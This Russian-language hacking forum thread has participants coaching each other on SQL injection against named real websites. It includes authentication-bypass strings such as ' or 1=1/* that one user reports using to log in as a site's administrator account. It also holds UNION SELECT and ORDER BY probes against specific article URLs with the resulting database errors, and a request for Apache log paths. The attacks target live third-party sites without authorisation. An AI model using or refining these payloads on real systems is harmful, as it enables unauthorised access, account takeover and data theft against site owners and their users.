единственный способ - гугл, если он проиндексировал раньше чем поставили "переписанные ссылки", либо тупо угадать
Да, но в идеале в этом фрейме может же оказаться содержимое нужных/интересных/ файлов? С таким же успехом ты можешь просто обратится к ним, например site.ru/.htaccess, вместо site.ru/script.asp?file=.htaccess Знаешь какой результат будет? =) Вот и у ифрейма тоже самое 159932, там mod_rewrite или в штацессе прописано что то типа add-type application/x-httpd-php .html
У меня такой вопрос. http://www.halbot.ru Странная форма авторизации. Я могу авторизоваться по типу: ' or 1=1/* : 1 Сразу появляется левая анкета, я ее не регистрировал. Так, вот попробовал авторизоваться под админом: "admin" : 'or 1=1/* admin'/* : 1 admin'/* : or 1=1/* Ковырял минут пять но эффекта не добился. В чем я могу ошибаться?
попробуй так Code: 1' or login like %admin% /* Т.е. заходить будет в том случает если логин содержит последовательность символов admin (admin123 SITEadmin RadminR) За место login может быть что-нибудь другое. Например пароль или мыло или аська....
В логине может быть максимум 12 знаков Пробовал 1' or admin' : 1 не получилось. Ни кавычки ничего он не съедает, а лишь тупо их пропускает.
Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен. Эээ..разобрался! Собственно так. Аккаунта admin там нет. Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему.
Гхм. Нашел. Админ - halbot Авторизовался как halbot : 'or 1=1/* А как ' or 999=999/* Не получилось. Самое интересное, что когда авторизуюсь под левым ником никакая информация не выскакивает. Один емейл тип zz@zz и все. Акк админа то есть, но входа в админку там нет.
Не могу раскрутить =\ : HTML: Database error with query: [SELECT s1.id as parent_id, s1.title as parent_title FROM sections as s LEFT JOIN sections as s1 on s.parent_id=s1.id WHERE s.id=]: error 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sinaius2/public_html/evreimir/article.php on line 41 (http://www.evreimir.com/article.php?id=-12032&res=1) Кроме этого: HTML: http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/* Все норм, а так: HTML: http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/* Ошибка. Почему?
у меня вобще не загружается http://www.rudtp.ru/articles.php?id=44+and+substring(version(),1,1)=3 в третьей ветке не предусмотрено использование конструкции union select
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
Искал на сайте уязвимость и вот что мне выдало: Code: Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed... Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.
Ну если я правильно понял то "-2570"- какой то третий параметр который ты можешь изменять... Уязвимость есть, но что либо сделать путного ты не сможешь к сожлению так как перед этим стоит order by...
